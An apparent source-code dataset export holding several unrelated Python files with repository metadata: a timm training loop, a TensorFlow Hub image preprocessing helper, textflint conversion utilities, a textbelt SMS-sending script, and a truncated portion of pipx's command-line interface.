if cfg.data.mixup.mixup_alpha > 0.:
criterion = SoftTargetCrossEntropy().cuda()
print('SoftTargetCrossEntropy is used for criterion\n')
elif cfg.data.mixup.label_smoothing > 0.:
criterion = LabelSmoothingCrossEntropy(cfg.data.mixup.label_smoothing).cuda()
print('LabelSmoothingCrossEntropy is used for criterion\n')
else:
criterion = torch.nn.CrossEntropyLoss().cuda()
print('CrossEntropyLoss is used for criterion\n')
loss_scaler = NativeScaler()
# load resume
start_epoch = 1
if cfg.resume is not None:
checkpoint = torch.load(cfg.resume, map_location='cpu')
model_without_dp.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])
loss_scaler.load_state_dict(checkpoint['scaler'])
start_epoch = checkpoint['epoch'] + 1
print(f'Resume was loaded from {cfg.resume}\n')
print(f'Start training for {cfg.epochs} epochs')
for epoch in range(start_epoch, cfg.epochs + 1):
# train one epoch
model.train()
metric_logger = MetricLogger(delimiter=' ')
metric_logger.add_meter('lr', SmoothedValue(window_size=1, fmt='{value:.6f}'))
header = f'Epoch: [{epoch:03}/{cfg.epochs:03}]'
for data in metric_logger.log_every(trainloader, cfg.print_iter_freq, header):
images = data[0].cuda(non_blocking=True)
labels = data[1].cuda(non_blocking=True)
if mixup_fn is not None:
images, labels = mixup_fn(images, labels)
with torch.cuda.amp.autocast():
outputs = model(images)
loss = criterion(outputs, labels)
loss_value = loss.item()
if not math.isfinite(loss_value):
print(f'Loss is {loss_value}, stopping training')
sys.exit(1)
optimizer.zero_grad()
is_second_order = (hasattr(optimizer, 'is_second_order')) and (optimizer.is_second_order)
loss_scaler(
loss=loss,
optimizer=optimizer,
parameters=model.parameters(),
create_graph=is_second_order
)
torch.cuda.synchronize()
metric_logger.update(loss=loss_value)
metric_logger.update(lr=optimizer.param_groups[0]['lr'])
# gather the stats from all process
metric_logger.synchronize_between_processes()
print(f'Averaged stats: {metric_logger}')
lr_scheduler.step(epoch)
if epoch % cfg.save_epoch_freq == 0:
save_path = f'{os.getcwd()}/{cfg.model.model_name}_{cfg.data.name}_{epoch:03}ep.pth'
torch.save({
'model': model_without_dp.state_dict(),
'optimizer': optimizer.state_dict(),
'lr_scheduler': lr_scheduler.state_dict(),
'scaler': loss_scaler.state_dict(),
'epoch': epoch
}, save_path)
save_path = f'{os.getcwd()}/{cfg.model.model_name}_{cfg.data.name}_{epoch:03}ep.pth'
torch.save({
'model': model_without_dp.state_dict(),
'optimizer': optimizer.state_dict(),
'lr_scheduler': lr_scheduler.state_dict(),
'scaler': loss_scaler.state_dict(),
'epoch': epoch
}, save_path)
if __name__ == '__main__':
main()
| 35.728571
| 101
| 0.644542
|
import os, sys
import math
import hydra
import torch
import timm
from hydra.utils import instantiate
from timm.loss import LabelSmoothingCrossEntropy, SoftTargetCrossEntropy
from timm.utils import NativeScaler
import models
from data import create_dataloader
from utils import MetricLogger, SmoothedValue
from utils import fix_random_seed
@hydra.main(config_path='./configs', config_name='pretrain')
def main(cfg):
if cfg.seed is not None:
fix_random_seed(cfg.seed)
torch.backends.cudnn.benchmark = True
trainloader, num_classes = create_dataloader(cfg.data)
mixup_fn = None
mixup_enable = (cfg.data.mixup.mixup_alpha > 0.) or (cfg.data.mixup.cutmix_alpha > 0.)
if mixup_enable:
mixup_fn = instantiate(cfg.data.mixup, num_classes=num_classes)
print(f'MixUp/Cutmix was enabled\n')
model = instantiate(cfg.model, num_classes=num_classes)
print(f'Model[{cfg.model.model_name}] was created')
model = torch.nn.parallel.DataParallel(model)
model.cuda()
model_without_dp = model.module
scaled_lr = cfg.optim.args.lr * cfg.data.loader.batch_size / 512.0
cfg.optim.args.lr = scaled_lr
optimizer = instantiate(cfg.optim, model=model)
print(f'Optimizer: \n{optimizer}\n')
lr_scheduler, _ = instantiate(cfg.scheduler, optimizer=optimizer)
print(f'Scheduler: \n{lr_scheduler}\n')
if cfg.data.mixup.mixup_alpha > 0.:
criterion = SoftTargetCrossEntropy().cuda()
print('SoftTargetCrossEntropy is used for criterion\n')
elif cfg.data.mixup.label_smoothing > 0.:
criterion = LabelSmoothingCrossEntropy(cfg.data.mixup.label_smoothing).cuda()
print('LabelSmoothingCrossEntropy is used for criterion\n')
else:
criterion = torch.nn.CrossEntropyLoss().cuda()
print('CrossEntropyLoss is used for criterion\n')
loss_scaler = NativeScaler()
start_epoch = 1
if cfg.resume is not None:
checkpoint = torch.load(cfg.resume, map_location='cpu')
model_without_dp.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])
loss_scaler.load_state_dict(checkpoint['scaler'])
start_epoch = checkpoint['epoch'] + 1
print(f'Resume was loaded from {cfg.resume}\n')
print(f'Start training for {cfg.epochs} epochs')
for epoch in range(start_epoch, cfg.epochs + 1):
model.train()
metric_logger = MetricLogger(delimiter=' ')
metric_logger.add_meter('lr', SmoothedValue(window_size=1, fmt='{value:.6f}'))
header = f'Epoch: [{epoch:03}/{cfg.epochs:03}]'
for data in metric_logger.log_every(trainloader, cfg.print_iter_freq, header):
images = data[0].cuda(non_blocking=True)
labels = data[1].cuda(non_blocking=True)
if mixup_fn is not None:
images, labels = mixup_fn(images, labels)
with torch.cuda.amp.autocast():
outputs = model(images)
loss = criterion(outputs, labels)
loss_value = loss.item()
if not math.isfinite(loss_value):
print(f'Loss is {loss_value}, stopping training')
sys.exit(1)
optimizer.zero_grad()
is_second_order = (hasattr(optimizer, 'is_second_order')) and (optimizer.is_second_order)
loss_scaler(
loss=loss,
optimizer=optimizer,
parameters=model.parameters(),
create_graph=is_second_order
)
torch.cuda.synchronize()
metric_logger.update(loss=loss_value)
metric_logger.update(lr=optimizer.param_groups[0]['lr'])
metric_logger.synchronize_between_processes()
print(f'Averaged stats: {metric_logger}')
lr_scheduler.step(epoch)
if epoch % cfg.save_epoch_freq == 0:
save_path = f'{os.getcwd()}/{cfg.model.model_name}_{cfg.data.name}_{epoch:03}ep.pth'
torch.save({
'model': model_without_dp.state_dict(),
'optimizer': optimizer.state_dict(),
'lr_scheduler': lr_scheduler.state_dict(),
'scaler': loss_scaler.state_dict(),
'epoch': epoch
}, save_path)
save_path = f'{os.getcwd()}/{cfg.model.model_name}_{cfg.data.name}_{epoch:03}ep.pth'
torch.save({
'model': model_without_dp.state_dict(),
'optimizer': optimizer.state_dict(),
'lr_scheduler': lr_scheduler.state_dict(),
'scaler': loss_scaler.state_dict(),
'epoch': epoch
}, save_path)
if __name__ == '__main__':
main()
| true
| true
|
f70b445e1cc3bd08d98868de9c00c440790bf47c
| 5,633
|
py
|
Python
|
deep_autoviml/preprocessing/preprocessing_images.py
|
chekoduadarsh/deep_autoviml
|
157fbdc2611dc0fbaee5fc4ebebe3e7c1eeb9b52
|
[
"Apache-2.0"
] | 1
|
2021-12-15T17:11:24.000Z
|
2021-12-15T17:11:24.000Z
|
deep_autoviml/preprocessing/preprocessing_images.py
|
chekoduadarsh/deep_autoviml
|
157fbdc2611dc0fbaee5fc4ebebe3e7c1eeb9b52
|
[
"Apache-2.0"
] | null | null | null |
deep_autoviml/preprocessing/preprocessing_images.py
|
chekoduadarsh/deep_autoviml
|
157fbdc2611dc0fbaee5fc4ebebe3e7c1eeb9b52
|
[
"Apache-2.0"
] | null | null | null |
#Copyright 2021 Google LLC
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
############################################################################################
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import tempfile
import pdb
import copy
import warnings
warnings.filterwarnings(action='ignore')
import functools
from itertools import combinations
from collections import defaultdict
# Make numpy values easier to read.
np.set_printoptions(precision=3, suppress=True)
############################################################################################
# data pipelines and feature engg here
# pre-defined TF2 Keras models and your own models here
from deep_autoviml.data_load.classify_features import check_model_options
# Utils
############################################################################################
# TensorFlow ≥2.4 is required
import tensorflow as tf
np.random.seed(42)
tf.random.set_seed(42)
from tensorflow.keras import layers
from tensorflow import keras
from tensorflow.keras.layers.experimental.preprocessing import Normalization, StringLookup, Hashing
from tensorflow.keras.layers.experimental.preprocessing import IntegerLookup, CategoryEncoding, CategoryCrossing
from tensorflow.keras.layers.experimental.preprocessing import TextVectorization, Discretization
from tensorflow.keras.layers import Embedding, Flatten
from tensorflow.keras.optimizers import SGD, Adam, RMSprop
from tensorflow.keras import layers
from tensorflow.keras import optimizers
from tensorflow.keras.models import Model, load_model
from tensorflow.keras import callbacks
from tensorflow.keras import backend as K
from tensorflow.keras import utils
from tensorflow.keras.layers import BatchNormalization
from tensorflow.keras.optimizers import SGD
from tensorflow.keras import regularizers
import tensorflow_hub as hub
import tensorflow_text as text
from sklearn.metrics import roc_auc_score, mean_squared_error, mean_absolute_error
from IPython.core.display import Image, display
import pickle
#############################################################################################
##### Suppress all TF2 and TF1.x warnings ###################
try:
tf.logging.set_verbosity(tf.logging.ERROR)
except:
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
############################################################################################
from tensorflow.keras.layers import Reshape, MaxPooling1D, MaxPooling2D, AveragePooling2D, AveragePooling1D
from tensorflow.keras import Model, Sequential
from tensorflow.keras.layers import Activation, Dense, Embedding, GlobalAveragePooling1D, GlobalMaxPooling1D, Dropout, Conv1D
from tensorflow.keras.layers.experimental.preprocessing import TextVectorization
############################################################################################
def preprocessing_images(train_ds, model_options):
"""
This produces a preprocessing layer for an incoming tf.data.Dataset. It can be images only.
You need to just send in a tf.data.DataSet from the training folder and a model_options dictionary.
It will return a full-model-ready layer that you can add to your Keras Functional model as image layer!
########### Motivation and suggestions for coding for Image processing came from this blog #########
Greatly indebted to Srivatsan for his Github and notebooks: https://github.com/srivatsan88/YouTubeLI
####################################################################################################
"""
try:
####### L O A D F E A T U R E E X T R A C T O R ################
url = "https://tfhub.dev/google/tf2-preview/mobilenet_v2/feature_vector/4"
feature_extractor = check_model_options(model_options, "tf_hub_model", url)
img_height = model_options["image_height"]
img_width = model_options["image_width"]
image_channels = model_options["image_channels"]
num_predicts = model_options["num_predicts"]
try:
feature_extractor_layer = hub.KerasLayer(feature_extractor, input_shape=(
img_height,img_width,image_channels))
except:
print('Loading model from Tensorflow Hub failed. Check the URL and try again...')
return
feature_extractor_layer.trainable = False
normalization_layer = tf.keras.layers.experimental.preprocessing.Rescaling(1./255)
tf.random.set_seed(111)
model = tf.keras.Sequential([
normalization_layer,
feature_extractor_layer,
tf.keras.layers.Dropout(0.3),
tf.keras.layers.Dense(num_predicts,activation='softmax')
])
model.compile(
optimizer='adam',
loss=tf.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=['accuracy'])
except:
print(' Error: Failed image preprocessing layer. Returning...')
return
return model
| 48.145299
| 126
| 0.648322
| true
| true
|
|
f70b453634eac4dbf2a64b4b70be55fdf1b7ac80
| 3,993
|
py
|
Python
|
evaluation/scripts/textflint_utils/utils.py
|
zpapakipos/dynabench-1
|
95884b4e29c57263dc1a85909be979c084d5fac3
|
[
"MIT"
] | 15
|
2021-09-24T00:46:04.000Z
|
2022-03-16T13:24:56.000Z
|
evaluation/scripts/textflint_utils/utils.py
|
zpapakipos/dynabench-1
|
95884b4e29c57263dc1a85909be979c084d5fac3
|
[
"MIT"
] | 98
|
2021-09-22T12:33:21.000Z
|
2022-03-21T22:23:52.000Z
|
evaluation/scripts/textflint_utils/utils.py
|
zpapakipos/dynabench-1
|
95884b4e29c57263dc1a85909be979c084d5fac3
|
[
"MIT"
] | 12
|
2021-09-25T05:08:18.000Z
|
2022-02-28T21:02:20.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Convert data to textflint format and run transform functions in textflint
import glob
import json
import os
from textflint import Engine
CONFIG_PATH = "textflint_utils/configs"
TRANSFORM_FIELDS = {
"nli": {"context": "premise", "hypothesis": "hypothesis"},
"sentiment": {"statement": "x"},
"hs": {"statement": "x"},
"qa": {"context": "context", "question": "question"},
}
LABEL_FIELD = {"nli": "label", "sentiment": "label", "hs": "label", "qa": "answer"}
LABEL_MAP = {
"nli": {
"neutral": "neutral",
"contradictory": "contradiction",
"entailed": "entailment",
},
"sentiment": {"positive": "positive", "negative": "negative", "neutral": "neutral"},
"hs": {"hateful": "hateful", "not-hateful": "not-hateful"},
}
def findall(p, s):
# Yields all the positions of the pattern p in the string s.
i = s.find(p)
while i != -1:
yield i
i = s.find(p, i + 1)
# This converts dynabench dataset to textflint format
def reformat_data_to_textflint(samples, task):
converted_samples = []
perturb_fields = TRANSFORM_FIELDS.get(task, None)
label_map = LABEL_MAP.get(task, None)
for i in range(len(samples)):
sample = samples[i]
converted = {"sample_id": i + 1}
if task == "qa":
answer = sample["answer"]
if type(answer) is list:
answers = set(answer)
else:
answers = [answer]
converted["answers"] = []
for answer in answers:
converted["answers"] += [
{"text": answer, "answer_start": i}
for i in findall(answer, sample["context"])
]
converted["title"] = ""
converted["is_impossible"] = False
else:
converted["y"] = label_map[sample["label"]]
for key, value in perturb_fields.items():
converted[value] = sample[key]
converted_samples.append(converted)
return converted_samples
def load_config(config_path):
config = None
with open(config_path) as f:
config = json.loads(f.read())
return config
def get_orig_value(data, sample, field):
return data[sample["sample_id"]][field]
def get_transformed_data(config_path, data, task):
config = load_config(config_path)
out_dir = config["out_dir"]
out_files = os.listdir(out_dir)
trans_samples = []
perturb_fields = TRANSFORM_FIELDS.get(task, None)
label_field = LABEL_FIELD.get(task, None)
for fname in out_files:
if fname.startswith("ori"):
continue
fname = os.path.join(out_dir, fname)
parts = fname.split("_")
new_suffix = "_".join(parts[1:-1])
with open(fname) as f:
for line in f:
sample = json.loads(line)
trans_sample = {"input_id": get_orig_value(data, sample, "uid")}
trans_sample[label_field] = get_orig_value(data, sample, label_field)
for key, value in perturb_fields.items():
trans_sample[key] = sample[value]
# create an unique uid for new examples
trans_sample["uid"] = str(trans_sample["input_id"]) + "_" + new_suffix
trans_samples.append(trans_sample)
return trans_samples
def run_textflint(data, task):
textflint_data = reformat_data_to_textflint(data, task)
engine = Engine()
config_file = os.path.join(CONFIG_PATH, task + "_config.json")
config = load_config(config_file)
out_dir = config["out_dir"]
files = glob.glob(out_dir + "/*")
for f in files:
os.remove(f)
engine.run(textflint_data, config_file)
perturbed_data = get_transformed_data(config_file, data, task)
return perturbed_data
| 32.201613
| 88
| 0.60556
|
import glob
import json
import os
from textflint import Engine
CONFIG_PATH = "textflint_utils/configs"
TRANSFORM_FIELDS = {
"nli": {"context": "premise", "hypothesis": "hypothesis"},
"sentiment": {"statement": "x"},
"hs": {"statement": "x"},
"qa": {"context": "context", "question": "question"},
}
LABEL_FIELD = {"nli": "label", "sentiment": "label", "hs": "label", "qa": "answer"}
LABEL_MAP = {
"nli": {
"neutral": "neutral",
"contradictory": "contradiction",
"entailed": "entailment",
},
"sentiment": {"positive": "positive", "negative": "negative", "neutral": "neutral"},
"hs": {"hateful": "hateful", "not-hateful": "not-hateful"},
}
def findall(p, s):
i = s.find(p)
while i != -1:
yield i
i = s.find(p, i + 1)
def reformat_data_to_textflint(samples, task):
converted_samples = []
perturb_fields = TRANSFORM_FIELDS.get(task, None)
label_map = LABEL_MAP.get(task, None)
for i in range(len(samples)):
sample = samples[i]
converted = {"sample_id": i + 1}
if task == "qa":
answer = sample["answer"]
if type(answer) is list:
answers = set(answer)
else:
answers = [answer]
converted["answers"] = []
for answer in answers:
converted["answers"] += [
{"text": answer, "answer_start": i}
for i in findall(answer, sample["context"])
]
converted["title"] = ""
converted["is_impossible"] = False
else:
converted["y"] = label_map[sample["label"]]
for key, value in perturb_fields.items():
converted[value] = sample[key]
converted_samples.append(converted)
return converted_samples
def load_config(config_path):
config = None
with open(config_path) as f:
config = json.loads(f.read())
return config
def get_orig_value(data, sample, field):
return data[sample["sample_id"]][field]
def get_transformed_data(config_path, data, task):
config = load_config(config_path)
out_dir = config["out_dir"]
out_files = os.listdir(out_dir)
trans_samples = []
perturb_fields = TRANSFORM_FIELDS.get(task, None)
label_field = LABEL_FIELD.get(task, None)
for fname in out_files:
if fname.startswith("ori"):
continue
fname = os.path.join(out_dir, fname)
parts = fname.split("_")
new_suffix = "_".join(parts[1:-1])
with open(fname) as f:
for line in f:
sample = json.loads(line)
trans_sample = {"input_id": get_orig_value(data, sample, "uid")}
trans_sample[label_field] = get_orig_value(data, sample, label_field)
for key, value in perturb_fields.items():
trans_sample[key] = sample[value]
trans_sample["uid"] = str(trans_sample["input_id"]) + "_" + new_suffix
trans_samples.append(trans_sample)
return trans_samples
def run_textflint(data, task):
textflint_data = reformat_data_to_textflint(data, task)
engine = Engine()
config_file = os.path.join(CONFIG_PATH, task + "_config.json")
config = load_config(config_file)
out_dir = config["out_dir"]
files = glob.glob(out_dir + "/*")
for f in files:
os.remove(f)
engine.run(textflint_data, config_file)
perturbed_data = get_transformed_data(config_file, data, task)
return perturbed_data
| true
| true
|
f70b468eed83845185b750bee867ad6d6a0b97d5
| 679
|
py
|
Python
|
smsarch.py
|
archzets/smsarch
|
b4fc69890dfb84e4e8636ee65ad68128a62a0da9
|
[
"BSL-1.0"
] | null | null | null |
smsarch.py
|
archzets/smsarch
|
b4fc69890dfb84e4e8636ee65ad68128a62a0da9
|
[
"BSL-1.0"
] | null | null | null |
smsarch.py
|
archzets/smsarch
|
b4fc69890dfb84e4e8636ee65ad68128a62a0da9
|
[
"BSL-1.0"
] | null | null | null |
import requests
import pyfiglet
ascii_banner = pyfiglet.figlet_format("SMSARCH")
print(ascii_banner)
import requests
while True:
kime = input("kim:")
mesaj = input("mesaj:")
if " " in kime or mesaj == "":
break
resp = requests.post('https://textbelt.com/text', {
'phone': '{}'.format(kime),
'message': '{}'.format(mesaj),
'key': 'textbelt',
})
print("Işlem: {} kalan hakkiniz: {}".format('Basarili'if resp.json()['success'] == 'True'
else 'basarisiz!!!',resp.json()['quotaRemaining']))
c = input("'exit()' or 'ENTER'")
if c=="exit()":
break
else:
pass
| 28.291667
| 99
| 0.537555
|
import requests
import pyfiglet
ascii_banner = pyfiglet.figlet_format("SMSARCH")
print(ascii_banner)
import requests
while True:
kime = input("kim:")
mesaj = input("mesaj:")
if " " in kime or mesaj == "":
break
resp = requests.post('https://textbelt.com/text', {
'phone': '{}'.format(kime),
'message': '{}'.format(mesaj),
'key': 'textbelt',
})
print("Işlem: {} kalan hakkiniz: {}".format('Basarili'if resp.json()['success'] == 'True'
else 'basarisiz!!!',resp.json()['quotaRemaining']))
c = input("'exit()' or 'ENTER'")
if c=="exit()":
break
else:
pass
| true
| true
|
f70b4712d4642d8fba04922d1c1c7b2949c947b8
| 27,320
|
py
|
Python
|
src/pipx/main.py
|
gotmax23/pipx
|
adb078cb9456c56da5f721da73c22df357a60bda
|
[
"MIT"
] | 1,244
|
2021-05-27T09:25:58.000Z
|
2022-03-31T19:03:41.000Z
|
src/pipx/main.py
|
gotmax23/pipx
|
adb078cb9456c56da5f721da73c22df357a60bda
|
[
"MIT"
] | 138
|
2021-05-27T09:47:41.000Z
|
2022-03-30T01:04:02.000Z
|
src/pipx/main.py
|
gotmax23/pipx
|
adb078cb9456c56da5f721da73c22df357a60bda
|
[
"MIT"
] | 97
|
2021-05-28T17:48:09.000Z
|
2022-03-30T00:31:32.000Z
|
# PYTHON_ARGCOMPLETE_OK
"""The command line interface to pipx"""
import argparse
import logging
import logging.config
import os
import re
import shlex
import sys
import textwrap
import time
import urllib.parse
from pathlib import Path
from typing import Any, Callable, Dict, List
import argcomplete # type: ignore
from packaging.requirements import InvalidRequirement, Requirement
from packaging.utils import canonicalize_name
import pipx.constants
from pipx import commands, constants
from pipx.animate import hide_cursor, show_cursor
from pipx.colors import bold, green
from pipx.constants import ExitCode
from pipx.emojis import hazard
from pipx.interpreter import DEFAULT_PYTHON
from pipx.util import PipxError, mkdir, pipx_wrap, rmdir
from pipx.venv import VenvContainer
from pipx.version import __version__
logger = logging.getLogger(__name__)
VenvCompleter = Callable[[str], List[str]]
def print_version() -> None:
print(__version__)
SPEC_HELP = textwrap.dedent(
"""\
The package name or specific installation source passed to pip.
Runs `pip install -U SPEC`.
For example `--spec mypackage==2.0.0` or `--spec git+https://github.com/user/repo.git@branch`
"""
)
PIPX_DESCRIPTION = textwrap.dedent(
f"""
Install and execute apps from Python packages.
Binaries can either be installed globally into isolated Virtual Environments
or run directly in a temporary Virtual Environment.
Virtual Environment location is {str(constants.PIPX_LOCAL_VENVS)}.
Symlinks to apps are placed in {str(constants.LOCAL_BIN_DIR)}.
"""
)
PIPX_DESCRIPTION += pipx_wrap(
"""
optional environment variables:
PIPX_HOME Overrides default pipx location. Virtual Environments will be installed to $PIPX_HOME/venvs.
PIPX_BIN_DIR Overrides location of app installations. Apps are symlinked or copied here.
USE_EMOJI Overrides emoji behavior. Default value varies based on platform.
PIPX_DEFAULT_PYTHON Overrides default python used for commands.
""",
subsequent_indent=" " * 24, # match the indent of argparse options
keep_newlines=True,
)
DOC_DEFAULT_PYTHON = os.getenv("PIPX__DOC_DEFAULT_PYTHON", DEFAULT_PYTHON)
INSTALL_DESCRIPTION = textwrap.dedent(
f"""
The install command is the preferred way to globally install apps
from python packages on your system. It creates an isolated virtual
environment for the package, then ensures the package's apps are
accessible on your $PATH.
The result: apps you can run from anywhere, located in packages
you can cleanly upgrade or uninstall. Guaranteed to not have
dependency version conflicts or interfere with your OS's python
packages. 'sudo' is not required to do this.
pipx install PACKAGE_NAME
pipx install --python PYTHON PACKAGE_NAME
pipx install VCS_URL
pipx install ./LOCAL_PATH
pipx install ZIP_FILE
pipx install TAR_GZ_FILE
The PACKAGE_SPEC argument is passed directly to `pip install`.
The default virtual environment location is {constants.DEFAULT_PIPX_HOME}
and can be overridden by setting the environment variable `PIPX_HOME`
(Virtual Environments will be installed to `$PIPX_HOME/venvs`).
The default app location is {constants.DEFAULT_PIPX_BIN_DIR} and can be
overridden by setting the environment variable `PIPX_BIN_DIR`.
The default python executable used to install a package is
{DOC_DEFAULT_PYTHON} and can be overridden
by setting the environment variable `PIPX_DEFAULT_PYTHON`.
"""
)
class LineWrapRawTextHelpFormatter(argparse.RawDescriptionHelpFormatter):
def _split_lines(self, text: str, width: int) -> List[str]:
text = self._whitespace_matcher.sub(" ", text).strip()
return textwrap.wrap(text, width)
class InstalledVenvsCompleter:
def __init__(self, venv_container: VenvContainer) -> None:
self.packages = [str(p.name) for p in sorted(venv_container.iter_venv_dirs())]
def use(self, prefix: str, **kwargs: Any) -> List[str]:
return [
f"{prefix}{x[len(prefix):]}"
for x in self.packages
if x.startswith(canonicalize_name(prefix))
]
def get_pip_args(parsed_args: Dict[str, str]) -> List[str]:
pip_args: List[str] = []
if parsed_args.get("index_url"):
pip_args += ["--index-url", parsed_args["index_url"]]
if parsed_args.get("pip_args"):
pip_args += shlex.split(parsed_args.get("pip_args", ""))
# make sure --editable is last because it needs to be right before
# package specification
if parsed_args.get("editable"):
pip_args += ["--editable"]
return pip_args
def get_venv_args(parsed_args: Dict[str, str]) -> List[str]:
venv_args: List[str] = []
if parsed_args.get("system_site_packages"):
venv_args += ["--system-site-packages"]
return venv_args
def run_pipx_command(args: argparse.Namespace) -> ExitCode: # noqa: C901
verbose = args.verbose if "verbose" in args else False
pip_args = get_pip_args(vars(args))
venv_args = get_venv_args(vars(args))
venv_container = VenvContainer(constants.PIPX_LOCAL_VENVS)
if "package" in args:
package = args.package
if urllib.parse.urlparse(package).scheme:
raise PipxError("Package cannot be a url")
if "spec" in args and args.spec is not None:
if urllib.parse.urlparse(args.spec).scheme:
if "#egg=" not in args.spec:
args.spec = args.spec + f"#egg={package}"
venv_dir = venv_container.get_venv_dir(package)
logger.info(f"Virtual Environment location is {venv_dir}")
if "skip" in args:
skip_list = [canonicalize_name(x) for x in args.skip]
if args.command == "run":
package_or_url = (
args.spec
if ("spec" in args and args.spec is not None)
else args.app_with_args[0]
)
# For any package, we need to just use the name
try:
package_name = Requirement(args.app_with_args[0]).name
except InvalidRequirement:
# Raw URLs to scripts are supported, too, so continue if
# we can't parse this as a package
package_name = args.app_with_args[0]
use_cache = not args.no_cache
commands.run(
package_name,
package_or_url,
args.app_with_args[1:],
args.python,
pip_args,
venv_args,
args.pypackages,
verbose,
use_cache,
)
# We should never reach here because run() is NoReturn.
return ExitCode(1)
elif args.command == "install":
return commands.install(
None,
None,
args.package_spec,
constants.LOCAL_BIN_DIR,
args.python,
pip_args,
venv_args,
verbose,
force=args.force,
include_dependencies=args.include_deps,
suffix=args.suffix,
)
elif args.command == "inject":
return commands.inject(
venv_dir,
None,
args.dependencies,
pip_args,
verbose=verbose,
include_apps=args.include_apps,
include_dependencies=args.include_deps,
force=args.force,
)
elif args.command == "upgrade":
return commands.upgrade(
venv_dir,
pip_args,
verbose,
include_injected=args.include_injected,
force=args.force,
)
elif args.command == "upgrade-all":
return commands.upgrade_all(
venv_container,
verbose,
include_injected=args.include_injected,
skip=skip_list,
force=args.force,
)
elif args.command == "list":
return commands.list_packages(venv_container, args.include_injected, args.json)
elif args.command == "uninstall":
return commands.uninstall(venv_dir, constants.LOCAL_BIN_DIR, verbose)
elif args.command == "uninstall-all":
return commands.uninstall_all(venv_container, constants.LOCAL_BIN_DIR, verbose)
elif args.command == "reinstall":
return commands.reinstall(
venv_dir=venv_dir,
local_bin_dir=constants.LOCAL_BIN_DIR,
python=args.python,
verbose=verbose,
)
elif args.command == "reinstall-all":
return commands.reinstall_all(
venv_container,
constants.LOCAL_BIN_DIR,
args.python,
verbose,
skip=skip_list,
)
elif args.command == "runpip":
if not venv_dir:
raise PipxError("Developer error: venv_dir is not defined.")
return commands.run_pip(package, venv_dir, args.pipargs, args.verbose)
elif args.command == "ensurepath":
try:
return commands.ensure_pipx_paths(force=args.force)
except Exception as e:
logger.debug("Uncaught Exception:", exc_info=True)
raise PipxError(str(e), wrap_message=False)
elif args.command == "completions":
print(constants.completion_instructions)
return ExitCode(0)
else:
raise PipxError(f"Unknown command {args.command}")
def add_pip_venv_args(parser: argparse.ArgumentParser) -> None:
parser.add_argument(
"--system-site-packages",
action="store_true",
help="Give the virtual environment access to the system site-packages dir.",
)
parser.add_argument("--index-url", "-i", help="Base URL of Python Package Index")
parser.add_argument(
"--editable",
"-e",
help="Install a project in editable mode",
action="store_true",
)
parser.add_argument(
"--pip-args",
help="Arbitrary pip arguments to pass directly to pip install/upgrade commands",
)
def add_include_dependencies(parser: argparse.ArgumentParser) -> None:
parser.add_argument(
"--include-deps", help="Include apps of dependent packages", action="store_true"
)
def _add_install(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"install",
help="Install a package",
formatter_class=LineWrapRawTextHelpFormatter,
description=INSTALL_DESCRIPTION,
)
p.add_argument("package_spec", help="package name or pip installation spec")
add_include_dependencies(p)
p.add_argument("--verbose", action="store_true")
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
p.add_argument(
"--suffix",
default="",
help=(
"Optional suffix for virtual environment and executable names. "
"NOTE: The suffix feature is experimental and subject to change."
),
)
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help=(
"The Python executable used to create the Virtual Environment and run the "
"associated app/apps. Must be v3.6+."
),
)
add_pip_venv_args(p)
def _add_inject(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"inject",
help="Install packages into an existing Virtual Environment",
description="Installs packages to an existing pipx-managed virtual environment.",
)
p.add_argument(
"package",
help="Name of the existing pipx-managed Virtual Environment to inject into",
).completer = venv_completer
p.add_argument(
"dependencies",
nargs="+",
help="the packages to inject into the Virtual Environment--either package name or pip package spec",
)
p.add_argument(
"--include-apps",
action="store_true",
help="Add apps from the injected packages onto your PATH",
)
add_include_dependencies(p)
add_pip_venv_args(p)
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
p.add_argument("--verbose", action="store_true")
def _add_upgrade(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"upgrade",
help="Upgrade a package",
description="Upgrade a package in a pipx-managed Virtual Environment by running 'pip install --upgrade PACKAGE'",
)
p.add_argument("package").completer = venv_completer
p.add_argument(
"--include-injected",
action="store_true",
help="Also upgrade packages injected into the main app's environment",
)
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
add_pip_venv_args(p)
p.add_argument("--verbose", action="store_true")
def _add_upgrade_all(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"upgrade-all",
help="Upgrade all packages. Runs `pip install -U <pkgname>` for each package.",
description="Upgrades all packages within their virtual environments by running 'pip install --upgrade PACKAGE'",
)
p.add_argument(
"--include-injected",
action="store_true",
help="Also upgrade packages injected into the main app's environment",
)
p.add_argument("--skip", nargs="+", default=[], help="skip these packages")
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
p.add_argument("--verbose", action="store_true")
def _add_uninstall(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"uninstall",
help="Uninstall a package",
description="Uninstalls a pipx-managed Virtual Environment by deleting it and any files that point to its apps.",
)
p.add_argument("package").completer = venv_completer
p.add_argument("--verbose", action="store_true")
def _add_uninstall_all(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"uninstall-all",
help="Uninstall all packages",
